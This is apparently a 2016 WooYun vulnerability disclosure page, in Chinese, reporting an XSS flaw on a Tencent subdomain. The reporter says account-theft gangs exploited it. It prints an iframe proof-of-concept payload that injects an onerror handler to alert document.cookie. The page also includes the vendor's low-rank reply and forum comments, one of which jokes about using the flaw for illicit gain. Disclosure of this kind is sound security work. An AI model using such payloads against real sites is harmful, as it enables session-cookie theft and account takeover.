漏洞概要

缺陷编号: 2016-205124

漏洞标题: 腾讯又一XSS被广泛用于黑产

相关厂商: 腾讯

漏洞作者: %2e

提交时间: 2016-05-05 12:43

公开时间: 2016-06-20 22:20

漏洞类型: XSS 跨站脚本攻击

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: [email protected]

Tags标签: XSS


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

这个问题有点严重....华强北那群搞iCloud账户密码,就是这么干的..
这就是为毛点链接密码就被改了的原因..

详细说明:

poc

code 区域
<iframe src="http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)>" ></iframe>





QQ图片20160504225251.png

漏洞证明:

poc

code 区域
<iframe src="http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)>" ></iframe>





QQ图片20160504225251.png



修复方案:

:)无

版权声明:转载请注明来源 乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2016-05-06 22:19

厂商回复:

非常感谢您的报告。该问题已经先通过其它渠道发现并已着手处理。如您有进一步发现,请及时与我们联系。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-05-05 13:09 | dige ( 路人 | Rank:5 漏洞数:3 | 路虽远,行则必达,事虽难做则必成)
    0

    66666

    1# 回复此人
  2. 2016-05-05 13:18 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)
    0

    腾讯的xss总是被广泛用于黑产~

    2# 回复此人
  3. 2016-05-05 13:57 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)
    0

    洞主你是深圳的?

    3# 回复此人
  4. 2016-05-06 22:56 | 蜀骷卿 ( 实习白帽子 | Rank:53 漏洞数:14 | 爱好互联网,为网络安全做出贡献)
    2

    腾讯的回复好像真的只有一种啊

    4# 回复此人
  5. 2016-05-07 10:03 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)
    0

    洞主要是不匿名,分分钟被人射死!

    5# 回复此人
  6. 2016-05-07 10:10 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢,一生只够爱一个人。)
    0

    这就蛋疼了。。洞主还不如拿去搞嘿

    6# 回复此人
  7. 2016-05-07 10:24 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不,,不要误会,我不是针对谁,我是说在座...)
    0

    又是问题已经先通过其它渠道发现,这个其他渠道真是叼的一笔!

    7# 回复此人
  8. 2016-05-07 10:36 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢,一生只够爱一个人。)
    0

    然而是首发他也这样说。。。蛋疼

    8# 回复此人
  9. 2016-05-07 12:46 | 傻强_在路上 ( 路人 | Rank:30 漏洞数:2 | 安全路上小小小小白一枚)
    0

    腾讯每次都是这种咩? 1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

    9# 回复此人
  10. 2016-05-07 13:02 | p1tt0 ( 路人 | Rank:2 漏洞数:1 | 我就是我,颜色不一样的烟火)
    0

    1rank,这是故意的??

    10# 回复此人
  11. 2016-05-07 17:06 | 兔八哥 ( 实习白帽子 | Rank:41 漏洞数:6 | 我心飞 翔)
    0

    少一点套路,多一点真诚,TX的其他渠道要媲美TG的相关部门了

    11# 回复此人
  12. 2016-06-21 02:58 | Fu地魔 ( 路人 | Rank:20 漏洞数:8 | 无声无息)
    0

    看腾讯是怎么给你1Rank的,后面排队。

    12# 回复此人
  13. 2016-06-21 08:00 | SoulHunter ( 实习白帽子 | Rank:44 漏洞数:15 | 已经死了。)
    0

    看腾讯是怎么给你1Rank的,后面排队。

    13# 回复此人
  14. 2016-06-21 09:40 | yzy9952 ( 实习白帽子 | Rank:64 漏洞数:10 | yzy9952)
    0

    还不胜搞黑产,1Rank

    14# 回复此人
  15. 2016-06-21 09:50 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)
    0

    弹一下就好了?内容太少,所以1rank.

    15# 回复此人
  16. 2016-06-21 10:15 | 美食家L ( 实习白帽子 | Rank:65 漏洞数:10 | http://404.so 安静的坚持自己的原则)
    0

    为啥要说出来!

    16# 回复此人
  17. 2016-06-21 10:41 | 潘多拉 ( 路人 | Rank:0 漏洞数:1 | 专注于岛国爱情片,打码片)
    1

    洞主一个字装逼犯傻

    17# 回复此人